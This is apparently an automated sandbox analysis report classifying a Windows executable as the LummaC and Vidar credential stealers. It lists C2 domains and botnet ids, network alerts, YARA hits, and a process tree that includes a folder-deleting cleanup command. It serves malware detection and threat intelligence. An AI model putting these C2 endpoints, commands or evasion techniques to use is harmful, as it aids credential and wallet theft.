Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1521168
MD5:	021d0c04cb4de2638dbd89de7625f9b7
SHA1:	054945dca5b06ea8cdb7f00571084d406a3ff95c
SHA256:	ed59e78a2d10d6efec14c037d13d029d43a38f5a0ec1d441b3490e105a620913
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected LummaC Stealer

Yara detected Powershell download and execute

Yara detected Vidar stealer

.NET source code contains very large array initializations

.NET source code references suspicious native API functions

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE / OLE file has an invalid certificate

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 6900 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 021D0C04CB4DE2638DBD89DE7625F9B7)

conhost.exe (PID: 3940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 7152 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

GCGHJEBGHJ.exe (PID: 6068 cmdline: "C:\ProgramData\GCGHJEBGHJ.exe" MD5: 687846A623C1FE1DA95F0FA2FE4479DF)

conhost.exe (PID: 4896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 3136 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2052 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1080 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2740 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

WerFault.exe (PID: 2976 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 1692 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 6424 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2740 -s 676 MD5: C31336C1EFC2CCB44B4326EA793040F2)

JKFIDGDHJE.exe (PID: 6836 cmdline: "C:\ProgramData\JKFIDGDHJE.exe" MD5: 8D556F35D2768D27B334D0E76D4D3295)

conhost.exe (PID: 6484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegAsm.exe (PID: 736 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6316 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 6400 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 528 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 1908 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 3392 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 5424 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 4160 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

RegAsm.exe (PID: 2656 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)

cmd.exe (PID: 5176 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJKFHDBKFCAA" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

timeout.exe (PID: 5144 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["offensivedzvju.shop", "stogeneratmns.shop", "fragnantbui.shop", "drawzhotdog.shop", "reinforcenh.shop", "gutterydhowi.shop", "ghostreedmnu.shop", "vozmeatillu.shop"], "Build id": "H8NgCl--"}

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869", "https://t.me/jamsemlg"], "Botnet": "0076b6a02eb028dde461f6494f955b49"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000001D.00000002.2973194670.000000000118A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.2710042416.000000000459E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000001D.00000002.2971207252.000000000043A000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x367af:$pwsh: powershell 0x4c4898:$s1: GET %s HTTP/1 0x272d20:$s4: LdrLoadDll 0x275c5c:$s4: LdrLoadDll 0x275edd:$s4: LdrLoadDll 0x27697f:$s4: LdrLoadDll 0xf5760:$v6: start 0xf640a:$v6: start 0xf8bf9:$v6: start 0xf8c69:$v6: start 0xf8f86:$v6: start 0xf9069:$v6: start 0xf90e2:$v6: start 0xf9d66:$v6: start 0xfac57:$v6: start 0x109f00:$v6: start 0x109f17:$v6: start 0x109f33:$v6: start 0x109f4d:$v6: start 0x11325c:$v6: start 0x114319:$v6: start
00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: file.exe PID: 6900	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 6900	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 6900	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 7152	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7152	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: RegAsm.exe PID: 7152	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 7152	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RegAsm.exe PID: 2656	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2656	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegAsm.exe PID: 2656	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 14 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
19.2.JKFIDGDHJE.exe.4565570.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
29.2.RegAsm.exe.400000.0.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.4745570.2.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.4745570.2.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.4745570.2.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x34daf:$pwsh: powershell 0x4c2a98:$s1: GET %s HTTP/1 0x270f20:$s4: LdrLoadDll 0x273e5c:$s4: LdrLoadDll 0x2740dd:$s4: LdrLoadDll 0x274b7f:$s4: LdrLoadDll 0xf3960:$v6: start 0xf460a:$v6: start 0xf6df9:$v6: start 0xf6e69:$v6: start 0xf7186:$v6: start 0xf7269:$v6: start 0xf72e2:$v6: start 0xf7f66:$v6: start 0xf8e57:$v6: start 0x108100:$v6: start 0x108117:$v6: start 0x108133:$v6: start 0x10814d:$v6: start 0x11145c:$v6: start 0x112519:$v6: start
3.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.1.raw.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.1.raw.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x367af:$pwsh: powershell 0x4c4898:$s1: GET %s HTTP/1 0x272d20:$s4: LdrLoadDll 0x275c5c:$s4: LdrLoadDll 0x275edd:$s4: LdrLoadDll 0x27697f:$s4: LdrLoadDll 0xf5760:$v6: start 0xf640a:$v6: start 0xf8bf9:$v6: start 0xf8c69:$v6: start 0xf8f86:$v6: start 0xf9069:$v6: start 0xf90e2:$v6: start 0xf9d66:$v6: start 0xfac57:$v6: start 0x109f00:$v6: start 0x109f17:$v6: start 0x109f33:$v6: start 0x109f4d:$v6: start 0x11325c:$v6: start 0x114319:$v6: start
0.2.file.exe.4745570.2.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
0.2.file.exe.4745570.2.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0.2.file.exe.4745570.2.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x333af:$pwsh: powershell 0x4c0c98:$s1: GET %s HTTP/1 0x26f120:$s4: LdrLoadDll 0x27205c:$s4: LdrLoadDll 0x2722dd:$s4: LdrLoadDll 0x272d7f:$s4: LdrLoadDll 0xf1b60:$v6: start 0xf280a:$v6: start 0xf4ff9:$v6: start 0xf5069:$v6: start 0xf5386:$v6: start 0xf5469:$v6: start 0xf54e2:$v6: start 0xf6166:$v6: start 0xf7057:$v6: start 0x106300:$v6: start 0x106317:$v6: start 0x106333:$v6: start 0x10634d:$v6: start 0x10f65c:$v6: start 0x110719:$v6: start
3.2.RegAsm.exe.400000.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
3.2.RegAsm.exe.400000.1.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
3.2.RegAsm.exe.400000.1.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x34daf:$pwsh: powershell 0x4c2a98:$s1: GET %s HTTP/1 0x270f20:$s4: LdrLoadDll 0x273e5c:$s4: LdrLoadDll 0x2740dd:$s4: LdrLoadDll 0x274b7f:$s4: LdrLoadDll 0xf3960:$v6: start 0xf460a:$v6: start 0xf6df9:$v6: start 0xf6e69:$v6: start 0xf7186:$v6: start 0xf7269:$v6: start 0xf72e2:$v6: start 0xf7f66:$v6: start 0xf8e57:$v6: start 0x108100:$v6: start 0x108117:$v6: start 0x108133:$v6: start 0x10814d:$v6: start 0x11145c:$v6: start 0x112519:$v6: start
Click to see the 9 entries

Suricata Signatures

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:45.707900+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49737	188.114.97.3	443	TCP
2024-09-28T05:23:46.702174+0200	2054653	1	A Network Trojan was detected	192.168.2.6	49738	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:45.707900+0200	2049836	1	A Network Trojan was detected	192.168.2.6	49737	188.114.97.3	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:46.702174+0200	2049812	1	A Network Trojan was detected	192.168.2.6	49738	188.114.97.3	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (offensivedzvju .shop in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:45.558697+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.6	49737	188.114.97.3	443	TCP
2024-09-28T05:23:46.233021+0200	2056161	1	Domain Observed Used for C2 Detected	192.168.2.6	49738	188.114.97.3	443	TCP

ET MALWARE Vidar Stealer Form Exfil

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:55.448976+0200	2054495	1	A Network Trojan was detected	192.168.2.6	49745	45.132.206.251	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:45.076275+0200	2056160	1	Domain Observed Used for C2 Detected	192.168.2.6	58005	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:29.391839+0200	2044247	1	Malware Command and Control Activity Detected	172.67.167.90	443	192.168.2.6	49723	TCP
2024-09-28T05:24:18.225609+0200	2044247	1	Malware Command and Control Activity Detected	172.67.167.90	443	192.168.2.6	49751	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:30.590913+0200	2051831	1	Malware Command and Control Activity Detected	172.67.167.90	443	192.168.2.6	49724	TCP
2024-09-28T05:24:19.417032+0200	2051831	1	Malware Command and Control Activity Detected	172.67.167.90	443	192.168.2.6	49752	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:28.147378+0200	2049087	1	A Network Trojan was detected	192.168.2.6	49722	172.67.167.90	443	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-28T05:23:43.885838+0200	2803304	3	Unknown Traffic	192.168.2.6	49735	172.67.167.90	443	TCP
2024-09-28T05:23:46.534105+0200	2803304	3	Unknown Traffic	192.168.2.6	49739	172.67.167.90	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869", "https://t.me/jamsemlg"], "Botnet": "0076b6a02eb028dde461f6494f955b49"}
Source: 13.2.RegAsm.exe.400000.0.unpack	Malware Configuration Extractor: LummaC {"C2 url": ["offensivedzvju.shop", "stogeneratmns.shop", "fragnantbui.shop", "drawzhotdog.shop", "reinforcenh.shop", "gutterydhowi.shop", "ghostreedmnu.shop", "vozmeatillu.shop"], "Build id": "H8NgCl--"}

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\JKFIDGDHJE.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\66f75fd9dc673_vasd[1].exe	ReversingLabs: Detection: 28%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 42%
Source: file.exe	Virustotal: Detection: 44%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Sample uses string decryption to hide its real strings

Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: reinforcenh.shop
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: stogeneratmns.shop
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: fragnantbui.shop
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: drawzhotdog.shop
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: vozmeatillu.shop
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: ghostreedmnu.shop
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: gutterydhowi.shop
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: offensivedzvju.shop
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 0000000D.00000002.2666831686.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String decryptor: H8NgCl--

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_004080A1 CryptUnprotectData,LocalAlloc,LocalFree,	3_2_004080A1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00408048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	3_2_00408048
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00411E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	3_2_00411E5D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040A7D8 _memset,lstrlenA,CryptStringToBinaryA,_memmove,lstrcatA,lstrcatA,	3_2_0040A7D8

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.90:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.90:443 -> 192.168.2.6:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.6:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.167.90:443 -> 192.168.2.6:49748 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: freebl3.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: freebl3.pdbp source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, freebl3.dll.3.dr
Source:	Binary string: c:\rje\tg\\obj\Release\ojc.pdbXRVnRV `RV_CorExeMainmscoree.dll source: file.exe
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr
Source:	Binary string: c:\rje\tg\\obj\Release\ojc.pdb source: file.exe
Source:	Binary string: softokn3.pdb@ source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, msvcp140.dll.3.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, nss3.dll.3.dr
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, mozglue.dll.3.dr
Source:	Binary string: c:\rje\tg\30p0ko7\obj\Release\ojc.pdbXRVnRV `RV_CorExeMainmscoree.dll source: JKFIDGDHJE.exe.3.dr
Source:	Binary string: softokn3.pdb source: file.exe, 00000000.00000002.2170671560.0000000004745000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2710203161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, softokn3.dll.3.dr
Source:	Binary string: c:\rje\tg\30p0ko7\obj\Release\ojc.pdb source: JKFIDGDHJE.exe.3.dr
Source:	Binary string: c:\rje\tg\zto9\obj\Release\ojc.pdb source: GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr
Source:	Binary string: c:\rje\tg\zto9\obj\Release\ojc.pdbX source: GCGHJEBGHJ.exe.3.dr, 66f75feece638_ldmg[1].exe.3.dr

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_00409D1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	3_2_0040D5C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,	3_2_00401D80
